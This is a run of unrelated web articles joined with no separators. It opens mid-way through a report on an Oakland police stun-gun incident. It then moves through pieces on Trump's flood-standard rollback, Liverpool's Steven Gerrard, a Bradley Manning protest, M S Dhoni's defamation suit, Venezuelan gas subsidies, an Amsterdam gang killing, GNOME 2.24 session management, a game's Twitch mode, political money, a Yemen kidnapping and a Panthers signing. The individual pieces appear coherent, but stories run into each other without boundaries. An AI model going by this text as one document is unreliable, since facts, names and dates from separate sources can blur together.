A 2011 study by the U.S. Department of Justice examined hundreds of cases in which people died after being stunned and recommended that police avoid shocking suspects repeatedly or continuously. Most of the deaths were associated with underlying health problems such as heart disease, drug use or other issues.
The report noted that, after being stunned, “the suspect should be carefully observed for signs of distress and should be medically evaluated at the earliest opportunity.”
Oakland police did not say whether they shocked the man more than once on Thursday.
The Oakland Police Department's general orders say that stun guns can be used “to control dangerous and violent subjects” and should involve the “minimum amount of electrical stimulation that is reasonable to obtain control.”
Anyone with information on the incident can contact the Police Department at (510) 238-3831 or call the department's tip line at (510) 777-7950.
Kimberly Veklerov is a San Francisco Chronicle staff writer. Email: kveklerov@sfchronicle.com Twitter: @KVeklerov
Trump Rolls Back Obama-Era Flood Standards For Infrastructure Projects
Enlarge this image toggle caption Michael Reynolds/Getty Images Michael Reynolds/Getty Images
President Trump's astonishing press conference on Tuesday was, ostensibly, an announcement about infrastructure. But his brief remarks on the permitting process were entirely overshadowed by his defense of attendees at a white supremacist rally, among other remarks.
But the president was, in fact, announcing a new executive order with serious repercussions. Among other things, he is rolling back an Obama-era order that infrastructure projects, like roads and bridges, be designed to survive rising sea levels and other consequences of climate change.
The executive order was meant to protect taxpayer dollars spent on projects in areas prone to flooding and to improve "climate resilience" across the U.S. — that is, communities' ability to cope with the consequences of global warming.
President Barack Obama signed the order in 2015, but the changes have not taken effect; FEMA has been soliciting input and drafting new rules.
Now, the order has been revoked as part of an effort to "slash the time it takes" to approve new infrastructure projects, as Transportation Secretary Elaine Chao put it in a statement.
Speaking at Trump Tower in New York City, Trump said, "We're going to get infrastructure built quickly, inexpensively, relatively speaking, and the permitting process will go very, very quickly." Few details were revealed in that news conference, but the text of the order has since been published and it specifically revokes Obama's flood risk rules.
Supporters say the Obama flood rules would protect lives, by positioning new roads and buildings on safer ground, and protect financial investments by ensuring that infrastructure projects last as long as they were intended. Some business advocates have objected, saying the new rules would increase the cost of new construction.
Trump's decision to roll back the policy was denounced by environmental groups as soon as it was first reported.
"This is climate science denial at its most dangerous, as Trump is putting vulnerable communities, federal employees, and families at risk by throwing out any guarantee that our infrastructure will be safe," Sierra Club Executive Director Michael Brune said in a statement ahead of Trump's remarks.
The Obama administration's order covered only public infrastructure projects. But revoking it could have implications for private development as well — for example, if the government builds a road in a flood-prone area, residential development might follow.
In an op-ed in Politico, an environmental advocate and an insurance industry advocate — Robert Moore of the Natural Resources Defense Council and Franklin Nutter of the Reinsurance Association of America — urged Trump to maintain the standards. They said climate resilience is crucial across the country: "While many Americans may think flooding is only a problem for coastal regions prone to hurricanes and tropical storms, it is far more widespread than that and can devastate any state or region across the country. In just the past five years, all 50 states have experienced flood damage."
This is not the first time Trump has reversed an Obama order and pushed the U.S. government not to factor climate change into decisions. As Jay Price of member station WUNC reported for NPR earlier this year, the president told the federal government that it didn't need to treat climate change as a national security threat — despite the fact that rising sea levels pose a flooding hazard to military bases.
"The risks were highlighted in a report last summer by the Union of Concerned Scientists. It said 128 American military installations are at risk from sea level rise," Price reported.
Get the biggest Liverpool FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
STEVEN GERRARD has challenged Liverpool FC to keep up the pressure on the sides above them in the chase for European qualification.
And the Reds skipper says his side face seven “cup finals” between now and the end of the season, as they look to force their way into the Premier League's top five.
Liverpool's 2-1 win at Aston Villa on Sunday , secured courtesy of Gerrard's second-half penalty, moved them to within five points of fifth-placed Arsenal, who occupy the final European spot.
And the captain insists there will be no easing off from the Reds during their final seven games. Liverpool face home fixtures with Chelsea, in fourth, and sixth-placed Everton before the end of the season, whilst several of their rivals have games against each other.
“We need to keep the pressure up for that European place,” said Gerrard. “A lot of the teams above us need to play each other, so we're hoping there are a few slip-ups and we can capitalise.
“It's important that we keep on taking maximum points. The manager told us after the game that every game is like a cup final now.
“There is a little short season now of seven games and we just need to make sure that we play to our maximum in every game because if we don't, like at Southampton, we know we will be punished. We need to use the Villa game as a level of performance from which to continue.”
Gerrard took his goal tally for the season to 10 with his calmly-converted spot-kick at Villa Park, with Reds boss Brendan Rodgers effusive in his praise for the 32-year-old afterwards.
Rodgers has said that a new, extended contract for the midfielder is “on the agenda”, but Gerrard insists there is no rush.
“It's not a priority at the moment,” he said. “The important thing is to finish the season strongly and feeling good.
“I'm happy the club have mentioned a new contract, but it's not important. Is it something for the summer? You're better asking the manager and the board that question.”
Gerrard also took time to praise Philippe Coutinho, stating that the Brazilian's quality in the final third makes him a joy to play alongside.
“If you look at the weight of his pass for the first goal, then I think that just sums him up,” he said. “People can talk about how skilful he is and how quick his feet are, but to deliver a pass into the final third to create a goal, that shows what quality he has.
“If you have players like Coutinho and (Luis) Suarez in your team, then you win games.
“When you have attacking players of the quality of Coutinho, (Stewart) Downing and Suarez, if they play close to their level you know you are going to score goals against teams and inevitably you are going to win more games.
“Ever since I've been a player you always find it easier to play alongside quality players. All the way through, Michael Owen, (Fernando) Torres, Suarez, Coutinho, they are the easiest players to play with.”
Barely one week after the Obama campaign office on Telegraph Avenue in downtown Oakland had one of its window panes shattered by Occupy protesters, at least 100 protesters calling for the release of jailed U.S. Army soldier Private First Class Bradley Manning invaded the campaign offices Thursday, occupying them for at least three hours and bringing business to a standstill before police forced them out.
Manning, a U.S. solider who was deployed to Iraq, was arrested in 2010 on suspicion of leaking classified government information to whistleblower website WikiLeaks, headed by Julian Assange. Manning is entering his third year in prison since his arrest in May, 2010, and has spent nearly 800 days in prison with no trial.
“The soldiers who oppose these illegal wars have watched Bradley Manning being mistreated and illegally held for the last two years,” said Emma Cape, one of the protesters and a member of the Bradley Manning Support Network. “Many people thought President Barack Obama would stop torture, and now we are here to send a fax to his central campaign offices so that he can respond to our demands.”
Thursday night's protests, synchronized with similar protests in Portland, Oregon and Los Angeles, started peacefully at 14th Street and Broadway, before Occupy Oakland protesters and anti-war protesters trickled down Telegraph and started filling up the Obama campaign office, which has an open-door policy for members of the public. Before long, trumpets and chants of “Free Bradley Manning! Whistle-blowing is not a crime!” replaced the familiar sound of office telephones as protesters climbed on top of desks and danced to their chants, pushing campaign workers and volunteers into one corner of the room.
The protestors had two demands, read from a piece of paper distributed during the protest: “First that President Obama apologize for the comment he made at a fundraiser in April 2011 regarding PFC Manning's guilt. Commander-in-Chief Obama stated, ‘He broke the law.' This constitutes unlawful command influence.”
The second demand, protestors said, was for Obama to ensure that soldiers are free from unlawful pretrial punishment.
“Though he's yet to be convicted of any crime, PFC Manning has already been severely punished,” Cape read aloud from the printed demands. “We ask that President Obama pardon him of the remaining charges and seek to ensure the international human rights of other servicemen and women will be respected.”
Oakland resident Jeff Paterson, who participated in the protest, said all that protestors wanted was for Obama to keep his campaign promises. “What's outrageous is that Obama became president promising to protect whistleblowers. and yet he has been the most aggressive prosecutor of whistleblowers,” Paterson said. “President Obama should live up to candidate Obama's promises.”
Protesters danced on desks and erased a whiteboard with the Obama campaign's countdown to the November election, reading “82 Days to Go,” as campaign workers looked on. One protester brought a Chihuahua; another, a pet bunny that has become a permanent participant in Oakland protests. Meanwhile, a man smoked a joint and blew smoke out of a gigantic seashell, reducing the campaign office to a scene of near-total chaos as one campaign worker recorded the events.
The Oakland Police Department deployed officers as the situation became tense. A rumor spread among protesters that the police had been given orders that they be locked inside the campaign office and arrested, and so after nearly an hour of chanting and singing, they cleared the office, leaving just seven protesters inside, including two Iraq war veterans, Scott Olsen and Joshua Shepherd. Olsen, who was injured by police during an Occupy Oakland protest in October, 2011, has become a rallying figure for Occupy Oakland and anti-war protesters in the city. (See Oakland North coverage of the Occupy Oakland protests here.)
The remaining seven tried to send a fax demanding the release of Manning to President Obama's central campaign offices using the fax machine in the Oakland office before police arrived.
“In this country, veterans cannot communicate directly with their commander-in-chief,” Cape yelled from outside of the building, as inside the two veterans and five other protestors sat on the office floor with their hands locked together, followed by chants of “Send the fax, send the fax now!”
According to a press statement released late Thursday night by Oakland Police Department spokesperson Officer Johnna Watson, six of the seven protesters were arrested for trespassing after they refused to leave the Obama campaign office. “After several hours of OPD negotiating with the seven protesters, one protester decided to leave; the other six protesters were arrested for trespassing as requested by the building management,” Watson wrote. “The building has been secured and the protesters have dispersed peacefully.”
Thursday's protests coincided with rising tension between the British government and the government of Ecuador, which earlier in the day officially granted political asylum to WikiLeaks founder Julian Assange, who has taken shelter inside the Ecuadorean embassy in London over the last two months to avoid extradition to Sweden.
“I think it's tremendous that people are here to stand up for Bradley Manning,” said Oakland protester Marianne Thomas. “He is the hero. We need more Bradley Mannings and we need more people like the people here too today to protect our rights.”
The Madras High Court today restrained Zee News and News Nation channels from telecasting any news linking India cricket captain M S Dhoni with the Indian Premier League (IPL) betting/fixing scam.
The interim order, effective for two weeks, was passed by Justice S Tamilvanan on a defamation suit filed by Dhoni claiming Rs 100 crore damages from the Zee Media Corporation for allegedly telecasting "malicious" news that he was involved in betting, spot and match fixing of IPL matches.
"I am of the view that there is a prima facie case and the balance of convenience is also in favour of the plaintiff. Hence interim injection granted for a period of two weeks," the judge said in his order after perusing Dhoni's affidavit.
He issued notice to defendants Zee Media Corporation Limited, Zee News Editor and Business Head Sudhir Chaudary, IPS officer G Sampath Kumar (who initially probed the IPL betting scam) and News Nation network private limited.
Dhoni, in his suit, submitted that the defendants had been carrying highly defamatory, scandalous and libellous false reports and statements since February 11, 2014.
The first and second defendants Zee Media Corporation Limited (Zee News) and Sudhir Chaudary, Editor and Business Head of Zee News Channel, Essel Studios, Noida, Uttar Pradesh, in collusion with the third defendant IPS officer G Sampath Kumar have been telecasting and broadcasting and posting in their websites false reports insinuating that Dhoni was involved in illegal activities of betting, match fixing and spot fixing.
Similarly, defendant no.4, News Nation network private limited (News National channel) Noida, UP, joined the tirade against Dhoni and later on went to the extent of stating that Dhoni was summoned by the Tamil Nadu police, which was also utterly false, the affidavit stated.
He charged that actions were done with an intention to project Dhoni as an object of hate and ridicule to the general public. The general public, especially IPL fans of Chennai Superkings in Chennai, have been negatively influenced by themalicious false reports, it claimed.
The sole agenda of the defendants was somehow to malign and destroy the reputation of the plaintiff in the eyes of the millions of his fans and cricket lovers all over the world.
Plaintiff has filed the suit because his fundamental right and personal rights had been breached by the telecast and broadcast of the malicious news.
He sought a permanent injunction restraining the defendants, their associations, sister concerns, agents, officers, correspondents, employees or any other person or entity in print or electronic media or via internet or otherwise from publishing/republishing or in any other manner circulating any news insinuating or denigrating his integrity and honesty as a cricketer except the publication of the news of the exact judicial order if any passed by the court.
Damages are to be paid jointly and severally by all the defendants for an amount of Rs 100 crore, the affidavit said.
PTI
Firstpost is now on WhatsApp. For the latest analysis, commentary and news updates, sign up for our WhatsApp services. Just go to Firstpost.com/Whatsapp and hit the Subscribe button.
Where Juan Cristobal dares to imagine a future where we tax the consumption of gasoline, instead of mindlessly subsidizing it.
A few years ago, a group of experts identified the types of policies that most countries with high growth experiences had implemented, as well as the ones they avoid. Their results, published in “The Growth Report,” are as close to an approachable recipe book on growth as you're going to find.
This is the seventh part in a series on what Venezuela can learn from that exercise. In Part II, I tackled the importance of inserting Venezuela into the global economy. In Part III, Quico discussed getting the macroeconomic fundamentals right. In Part IV, we looked at why you need a financial system that fosters savings and investment. In Part V, I discussed the importance of letting the market tell you what you're good at. In Part VI, I made the plea for political parties to find some sort of consensus as a pre-condition for any strategy to work. Here's part VII, where I start discussing (to quote Mel Brooks) the things we “oughtn't to do but we do anyway”.
Turns out the first thing on this list is the policy choice Venezuela is most famous for:
It happens once every few months: a new ranking comes out listing countries by their internal price of gas, from highest to lowest.
If you're like me, your eyes automatically veer to the bottom of the list – not to see if Venezuela is listed as the cheapest gas in the world (duh), but to see how wide the gap has gotten.
But there is an interesting tale to be told at the top of the list. Right there, among the countries with the most expensive gas, is Norway. Norway! A major oil and gas producer, like us; unlike us, a modern, civilized society.
By subsidizing energy, the message our economy gets is “invest in energy-intensive industries, because that's where the money is.” It's a signal that disconnects our economy from its real advantages.
Norway has really expensive gas because instead of subsidizing energy, they tax the hell out of it. And while taxing energy in a country with lots of it might be counter-intuitive, it makes so much sense it was included in the list of “things to do” by the Commission on Growth and Development, publishers of The Growth Report. Subsidizing energy is at the top of their list of things to avoid.
They don't beat around the bush: “In many parts of the developing world, energy is subsidized. This is also a mistake. According to research by IMF economists, Indonesia and Yemen spent more on fuel subsidies in 2005 than on health and education combined. Although removing the subsidies is politically difficult, the costs of not doing so are high …”
In other words, removing energy subsidies and replacing them with energy taxes appears to be something countries with high levels of growth do. In spite of this, you would be tempted to be a contrarian on this one, because … why should that be the case? A subsidy on energy, after all, is a subsidy for industry and for consumers. Countries subsidize all sorts of things, and the report certainly does not suggest doing away with all subsidies.
What makes energy subsidies so damn toxic?
First, the strain it causes in our public finances.
Energy is very difficult to substitute away from – your ability to not use as much energy following a price increase is very limited, something we economists like to call having an “inelastic demand.” And when you face a good with inelastic demand, taxes on these goods will bring in lots of money precisely because consumers will not decrease their consumption when they are imposed. It's the same thing with cigarettes and booze, so not surprisingly many people say modern man is “addicted to oil.”
These taxes can be enormous. In the UK, for example, total fuel taxes amount to 38 billion pounds per year, roughly 7% of total taxation and 2.5% of GDP. Translate that to Venezuela, and we would be talking about $7.5 billion in lost taxes, a massive amount of money. If we add the money we use to subsidize energy, the amounts involved are much, much larger. Failing to be rational on energy simply leaves too much money on the table.
Subsidies on energy also damage our economy because they send the wrong signal on what we should be producing and what we should be consuming.
One of the main uses of the price system is that, when left to operate relatively freely, it tells a society what it should be focusing on. For example, when walnuts are much more expensive than olives, this suggests that resources would be better spent growing walnuts than olives. Company earnings go up, wages go up, collected taxes go up.
When you subsidize energy, this creates a massive, artificial advantage for industries that use energy very intensively – thinks like steel mills, oil refining, and industries that use a lot of air conditioning.
Countries that have shown high growth rates do not subsidize their domestic energy. The evidence on this is fairly overwhelming.
The general point is that industries that rely heavily on energy tend to provide few jobs, unlike other industries that we call “labor intensive” such as textiles.
By subsidizing energy, the message our economy gets is “invest in energy-intensive industries, because that's where the money is.” It's a signal that disconnects our economy from its real advantages.
A few years ago, some cattle-raising friends in Santa Barbara told me the story of a rancher who had imported Holstein cows from the Netherlands. The cows were so traumatized by the unbearable heat, the rancher had to install air conditioning units in their stables so that the cows could be more at peace. Do you think such inefficiencies would occur if the rancher had to pay international prices for electricity?
Or take buses. Have you ever wondered why Venezuelan long distance buses are air conditioned down to like 12 below zero? Here's the little secret: cold air masks odors. Since fuel costs nothing, the extra cost of cranking up the AC and keeping the bus extra cold is lower than the cost of actually cleaning the bus properly. Talk about a perverse incentive: gas subsidies actually make bus owners use diesel as cleaning fluid!
These ridiculous tales of air-conditioned cows and sub-zero buses underscore another point: energy subsidies tell people to consume lots of energy, and this creates huge social costs.
Not only is it inefficient from an environmental point of view – fomenting traffic, pollution, and the like – but it also creates enormous inefficiencies such as the ones highlighted above.
Subsidizing energy means you subsidize demand and disincentivize the supply of the stuff – is it any wonder we are facing massive blackouts and lines at the pump? And think about the havoc these blackouts create on the rest of our economy.
Subsidizing energy also creates huge opportunity costs, symbolized by the things we cannot afford precisely because we are giving people free gas. It's become a running joke to compare money spent on subsidizing energy as money spent on not subsidizing education and health, but it's true nonetheless.
Moreover, it's a terrible way to engage in social policy. People typically claim that gas should be cheap in Venezuela because “there must be some benefit to living in an oil-producing country.” But this is nonsense – the money spent subsidizing energy goes to big industrialists, truck drivers, and your wealthy aunt in El Cafetal that drives an SUV paying practically nothing for gas, while she bangs her pots against the government.
Countries that have shown high growth rates do not subsidize their domestic energy. The evidence on this is fairly overwhelming. It is about time we face the facts and realize that while having cheap gas and low electricity bills is great for your personal finances, it is the road to ruin.
Caracas Chronicles is 100% reader-supported. Support independent Venezuelan journalism by making a donation.
The decapitated body and severed head found in diferent parts of Amsterdam this week, belong to 23-year-old Amsterdam resident Nabil Amzieb. He had previous run-ins with the law and was known to the police, Het Parool reports.
The victim's body was found in a burning Volkswagen Caddy on Mijehof Tuesday morning. His head was found in front of sisha-lounge Fayrouz on Amstelveenseweg around 7:30 a.m. on Wednesday.
According to witnesses, the head was angle to look into the sisha lounge. "A sort of message", Stan Koeman, who owns a deli further up the road, said to Het Parool. "It looked weird. Something that does not belong to the Dutch streets. It made me think of the Middle Ages and the Middle East".
A number of mostly young Amsterdam residents with criminal records have been killed in and around the capital city since 2012. Many of these violent assassinations can be directly linked to each other and a conflict between rival criminal gangs that started in 2012.
According to Dutch newspaper AD, Amzieb was planning to give testimony against known criminal Beaouf A. - who is a suspect in the assassination of rival Gwenette Martha's right-hand man Najeb Bouhbouh in Antwerp. A. himself was the target of an assassination in Staatsliedenbuurt in 2012. He managed to escape, but his two young companions were killed. Last year the court sentenced Anour B. and Adil A. to life in prison for the Staatsliedenbuurt double assassination.
On March 22nd, 2014 Mohammed el Mayouri was gunned down on Karperweg, around the corner of Fayrouz. He was also killed right before he could testify in a case against Benaouf A.
According to Het Parool, the sisha lounge where the severed head was found on Wednesday morning, is a known hangout for a group of criminals involved in this gang war. Specifically from the group surrounding Houcine A. - a former associate and then rival of assassinated top criminal Gwenette Martha.
For various reasons (which in the end boil down to lack of manpower), we are quite late in the process of packaging GNOME 2.24. (This is almost finished now, I'll keep you informed.) Which is why I may sound coming a bit late on noticing this one, but I was really speechless.
The problem: session management has flaws
Currently, a session manager uses XSMP (the X Session Management Protocol) to talk to applications. What it means is that for applications supporting this protocol, it is able to do more than simply starting and killing them: it will also remember their state, and offer them a way to shut down gracefully. However, XSMP is really a shitty protocol – I won't explain why here, you will find tons of better explanations on the intarweb.
The gnome-session developers, being quite aware of this issue, did what anyone interested enough would have done: they designed a new protocol, based on D-Bus, and implemented it. The new protocol is not considered stable yet, but it is simple, efficient and above all, reliable – that's a giant leap forward. For this reason, I was very excited to see what gnome-session 2.24 would look like, since it brings major cleanups in the code.
The solution: remove session management!
When I first started it, it did not restore my saved session. I simply supposed that the format of the saved session had changed, and that writing a conversion tool would be in order. Wrong. Let's bring the session preferences:
The UI of this dialog hasn't changed since 2.22. However, I do not resist the urge to show you the code behind the “Remember Currently Running Applications” button:
static void on_save_session_clicked (GtkWidget *widget, GsmPropertiesDialog *dialog) { g_debug ("Session saving is not implemented yet!"); }
As for the check box on top of it, it sets a GConf value that is never read anywhere.
If you know the long term plans for GNOME, it makes sense: when gnome-shell replaces the panel and the window manager, it will also be responsible for starting the visible applications, while gnome-session will deal with what's happening behind the scenes. But gnome-shell is still far from ready, and you need something in the meantime for the basic requirements of a session manager!
Backwards compawhat?
The surprises don't stop here. I also noticed that logout was much faster – instantaneous instead of the usual 2-3 seconds. The reason why logging out is this long currently is not because it takes long to kill applications; it's because the session manager kindly requests applications supporting XSMP to shut down before killing them. If a document isn't saved, an application will be able to prevent the logout process. Guess what? Now gnome-session completely ignores XSMP applications. Since it doesn't need them to register for saving the session, it also saves the time to ask them to close cleanly.
The result is that you will see a lot of such dialogs:
It's very nice to replace a flawed protocol ; and really, the new protocol goes in the correct direction. But let's be realistic, it's impossible to immediately port hundreds of applications to a new protocol without having a transition time during which both protocols are supported. You also need to consider your protocol as stable before asking other developers to port their applications. And to get it accepted, you need to standardize it; freedesktop.org would have been the correct body. (Currently, the protocol lies in the org.gnome namespace, not org.freedesktop.)
Release management at its best
Wait… aren't there some distributions out there which already released stable versions with GNOME 2.24? The answer is yes. At least Ubuntu Intrepid and Fedora Core 10 ship with a session manager that:
is unable to restore applications;
kills applications without letting you save your work.
It's good to see such improvements on the session manager coming, and I'm really thankful to the gnome-session developers to work on it. What I wonder is:
How could it slip into a stable GNOME release?
How could two major distributions let it slip into a so-called stable release?
So what?
It definitely looks like we're not the only ones who could improve our release management processes.
This is a very good example of a lack of “big picture” thinking. On one side, there is a brilliant design and its good implementation. On the other side, two major regressions from the user's point of view – the kind of regressions that make people fly away.
If there's one thing that I've learned from working in IT, it's that you must often keep your brilliant designs as long-term goals. In the short term, you will run a bastardized version of your brilliant design that will make you cry; but it will work. When you need to talk to shitty applications or with shitty protocols, you need to write shitty code.
Twitch Mode is here!!! 😀
Now you can finally die spectacularly in front of a live audience.
Hear the roar of Twitch Chat!
If you've ever been in a Twitch Chat, you may have noticed the chaotic stream of emojis flying everywhere. We wanted to enhance this communication, and put all emojis typed into the robot audience!
Not only are they visible, but they also make a sound that's specific to each emoji!
Interpreted by genius writer Albert Lai, look forward to hearing ENCOURAGEMENT CUBE! and PINK HAIRED HUMAN! shouted from the audience.
You can also use Twitch's Cheering Feature to cheer on bigger streamers that support it!
Type cheer100 to have one audience robot perform a provocative dance!
Bet on how the streamer will die!
Who will kill the player? Now you can bet on it to earn Danger Coins!
As people place bets the prize pool increases! When the player finally dies everyone who bet on the correct enemy type splits the coins proportional to how much they bet!
You also get Danger Coins just for watching the stream. They are specific to each streamer you watch but are saved between play sessions!
Spawn Enemies!!!
One of the main uses of Danger Coins is spawning enemies.
You can spawn any enemy from the game on any level!
A little name tag lets the streamer know that it was YOU who spawned it. >:)
Spawning enemies is a fun way to try to claim the killer prize pool. Each time you spawn something it automatically places a bet for half the cost on that enemy type.
Give the player a clone <3
Are you too nice to spawn jetpack bots on bronze levels?
Help the player survive by spending 300 coins on a clone!
How to Stream or Watch
Check out the game's twitch page for current live streams and archived videos.
Want to Stream but don't have any Twitch followers?
Let the discord chat know that you're streaming! This is also a fun place to talk to fellow Clone Drone fans.
Tweet at Erik on the twitters and I will retweet your streaming announcement!
We've tested the game with only 5 watchers and it was really fun! 😀
Celebratory Live Robot Sculpting!
To celebrate the launch of Twitch Mode, the amazing Vulpsie will be creating a beautiful Clone Drone sculpture in front of a live audience next week.
Like this, but a clone drone in a dangerous situation!
Follow her channel to get notified when she goes live. 🙂
IndieDB top 100!
It brings me immense joy to announce that Clone Drone in the Danger Zone has been selected as one of IndieDB's Top 100 games of 2016! 😀
Do you think it should be numbed 1?
The second round of voting is in full swing! You can vote for the game here!
Get the update!
Already own the game? Here's how to download the update!
From The Atlantic:
Surveying America back in 2013, I concluded that “Christmas Is Kicking Ass in the War on Christmas,” noting the open-air Nativity scenes in the secular progressive enclave of Santa Monica; the 76-foot Christmas tree uncontroversially erected in the heart of New York City; the choir publicly singing “Happy birthday, Jesus! Happy birthday, Lord!” in Washington, D.C., and more.
This affection for the holiday that marks the birth of Jesus Christ extended all the way to the White House, where President Barack Obama recorded videos wishing the nation “Merry Christmas” in 2009, 2010, 2011, 2012, 2013, 2014, 2015, and 2016. “This is such a wonderful time of year,” Michelle Obama added one year, “a time to honor the story of love and redemption that began 2,000 years ago, to see the world through a child's eyes and rediscover the magic all around us, and to give thanks for the gifts that bless us every single day.”
But this year, a popular website associated with the populist-right political faction that controls the White House is subverting the Christmas spirit. Traditionally, it meant peace on earth, and good will toward men. But Breitbart readers are being asked to visit an online store that the company has set up called Deplorable Christmas, where the gifts express the values of “war” and ill-will.
Your daily dose of what's trending in money and politics:
BANKERS PREPARE TO SPEND…ANONYMOUSLY: Earlier this year Earlier this year we reported on what appeared to be an attempt by a group of banks to form a super PAC , which they said would let them “carry a big stick” and convince lawmakers that they'd work to kick them out of office if need be. As it turns out, that effort was put together by a collection of smaller community banks whose professed goals (collecting many smaller donations from many community banks) could have been accomplished with a regular PAC. And, sure enough, the super PAC they founded hasn't done a thing
But critics' concerns about that plan may not have been in vain. Yesterday, the American Bankers Association (the national trade association that represents all banks, but particularly big banks) voted to form a new 501(c)(4) group — a politically active nonprofit that can collect unlimited sums of cash to run politically-oriented advertisements, and, thanks to IRS rules about nonprofits, doesn't have to disclose any of its donors.
According to Bloomberg, the purpose of the group will be to collect donations from the ABA's member banks and then donate the money to super PACs that will attack or support various U.S. Senate candidates. While super PACs have to publicly disclose their donors, because the money will be coming from the 501(c)(4), the original source of the funds will remain anonymous.
Why go to the extra step of giving the money to a 501(c)(4) group and not just give directly to a super PAC? As we've seen recently, shareholders of big companies might take issue with large political donations from corporate coffers, and Wall Street's somewhat diminished reputation these days might make politicians less enthusiastic about having big banks on their side. But pushing the money through 501(c)(4) organizations, which we've dubbed shadow money groups for their lack of disclosure, wipes away any negative connotations — for both the donors and the politicians who benefit.
JEWELRY HEIR BEHIND ANTI-GAY MARRIAGE AD: A conservative super PAC called Campaign for American Values released an ad yesterday attacking President Barack Obama on the issue of gay marriage. Judging by some commentary on the Internet, the ad may be most notable for the less-than-convincing job the actors are doing (see the ad for yourself below), but it does represent one of the first major outside group attacks on Obama on the issue of gay marriage.
Campaign for American Values is headed by Gary L. Bauer, a prominent conservative Christian activist, former presidential candidate and high-ranking official at the Department of Education under President Ronald Reagan — but who is putting up the cash for all this? According to OpenSecrets.org , the group has raised more than $630,000 this cycle and the bulk of it came from one company — Corporate Land Management, Inc. A quick search of the Internet finds almost no information about the company other than its funding of this super PAC, but we dug into the corporate records (pdf) of this Texas-based company and found it has one man on its board of directors — Tim Horner. Horner is also the president of Premier Designs , a multi-level marketing jewelry company with a strong Christian ethos. The company was founded by his parents in the 1980s and has a non-profit arm that supports churches and missionary work.
For permission to reprint for commercial uses, such as textbooks, contact the Center: Feel free to distribute or cite this material, but please credit the Center for Responsive Politics.For permission to reprint for commercial uses, such as textbooks, contact the Center: [email protected]
Share your valuable feedback, comments or suggestions on Website Manager Webmaster
Website Manager Webmaster
The webmaster does contain the word “Master”, it says a lot, as a layman, we can think of a person, who is managing all the web. Reading a lot of stuff from the Internet, this man seems to be a person, who doesn't get much help from anybody else, he does everything by himself.
A webmaster may be designer, developer of a website, who may be managing their website. As a webmaster, it looks like a person, who does a lot of critical thinking, analysis and a lot of writing in regards to the websites he manages. He may be having a team, which may involve few SEO's, designers, developers, image editors, content writers who overall appreciate the webmaster. A webmaster is a person, who keeps all the details of the website, when the page was created, what the page tells about, what are the keywords used in it, what is a description, title, and tags. He analyses all the details with the competitor's pages. Keep track of a website on various search engines – ‘Google',' Yahoo', and ‘Bing' etc. His work is also reviewed, appraised; he is responsible for all the maintenance of the website that is why he is Webmaster. He is considered to be well versed with programming languages such as Perl and most of the HTML.
I have forgotten to mention, one more person, in the early of my paragraphs, Code tester, if, some programming is being done on the website, this person plays very important role, as he tests the code with various dummy data and take screenshots, coordinate with the programmer, webmaster to check if the code is serving what is required from that.
All these people work behind the scene, and the only Webmaster is treated on the screen, these people working behind the scene are talented, patient and knowledgeable people, who take co-operate and co-ordinate with the webmaster in the various activities of the website. For a perfect website, it must be free from all the errors, and which is the responsibility of the webmaster.
Remuneration – Website Manager Webmaster
There is always some budget allocation to be done by the individuals or businesses i.e. how much they want to spend on their website. Is it is cash-cow; a then the owner of the website may be spending a lot on it. Most of the websites are just mere business representations on the Internet. Once they are online, no further actions are being performed on them. So, they need a Webmaster only at the time of their making. A designer or developer at that time may play a role of webmaster and that cost is being included in the website making. But, if the website is a big portal, then there would be regular need of webmaster and he can cost around ten thousand dollars also.
It is true, that to make a website effective, you need to do investment. There is no metric to measure the effectiveness of a website. But, I can say that the sites which improve over time are effective. Like any other tangible business, goal setting is must in making the website effective.
Role – Website Manager Webmaster
Webmaster plays a role of Analysis, who learns about the industry for which the website is being there or is being prepared. He is the person, who can tell, what would be delayed action, direct action or indirect action.
Webmaster analyses Competitors websites, their position on the web, what content is there on them. After analyzing all this, he decides marketing strategy on the Internet.
6-Months of Netflix for $9.99
RadioShack is offering 6-Months of Netflix for free when you purchase a Boost Mobile, Virgin Mobile, TracFone, Net10 or TelCel Phone.
Yes, these can be no-contract phones. 6 Months of Netflix costs $48 so if you can find any no-contract phone under $48, you have a deal!
- Choose a phone from one of these. Make sure it states Get 6 months of Netflix
- Boost Mobile : $9.99
- Virgin Mobile : $14.99
- Tracfone : $9.99
- Purchase at least $25 to get free shipping or pickup in-stores
- For in-stores, make sure you tell the cashier that you want the Netflix code. The code will print on the receipt
- 6 Months of Netflix is good for new, existing and former Netflix members
- One promo code will be provided per qualifying product purchased. Max of 10. FAQ from Radio Shack here
DUBAI (Reuters) - Yemen's Houthi forces denied detaining a U.S. citizen and said he had been kidnapped by unknown gunmen in the capital Sanaa, a statement from the movement said.
Colleagues of Danny Lavon Burch, an engineer who had been working in Yemen since the late 1980s, said on Monday that Houthi forces had detained him in Sanaa.
The Iran-aligned Houthis and their ally former president Ali Abdullah Saleh control much of northern Yemen, including Sanaa, and are battling a Saudi-led coalition that is trying to restore the internationally recognized government.
An armed gang was behind “the criminal and cowardly act” of kidnapping Burch, a statement carried by the Houthi-controlled state news agency SABA said late on Wednesday.
“The security services are tracking the perpetrators of the kidnapping and they will be brought to justice,” it said.
His wife, Nadia Burch, told Reuters earlier this week that her husband had been seized on Saturday after taking their children to school. He has worked in Yemen since the late 1980s, currently with the oil company Safer, said Burch, a Yemeni.
“He has no problems or disputes with anyone, which is why he didn't leave as others did,” she said. “I ask for the release of my husband and his safe return to me.”
She said the kidnappers had not contacted her and she was unsure of their identity.
A U.S. State Department official said they were aware and concerned about the report of Burch's disappearance.
More than 10,000 people have been killed in Yemen's civil war. It began in March 2015 when the Houthis advanced on the interim headquarters of President Abd-Rabbu Mansour Hadi in the southern port city of Aden, forcing him to flee the country and seek Saudi help.
CHARLOTTE, N.C. -- The Carolina Panthers on Tuesday signed two-time Pro Bowl selection Michael Griffin to a one-year deal to add depth at safety.
Carolina also signed defensive tackle Kyle Love, who was with the team the past two seasons, because first-round pick Vernon Butler expected to miss at least the next two games with a high ankle sprain.
To make room for the additions, the Panthers released safety Marcus Ball and placed defensive end Ryan Delaire on injured reserve with a knee injury.
Michael Griffin spent the past nine seasons with the Titans before being released in February. Kim Klement/USA Today Sports
Ball was signed from the practice squad on Friday after backup safety Dean Marlowe (hamstring) went on injured reserve. He could return to the practice squad if he clears waivers.
Griffin, the 19th pick of the 2007 draft out of the University of Texas, spent the past nine seasons with the Tennessee Titans before being released in February. He signed with Minnesota in March, but was placed on injured reserve with a back injury when final cuts were made.
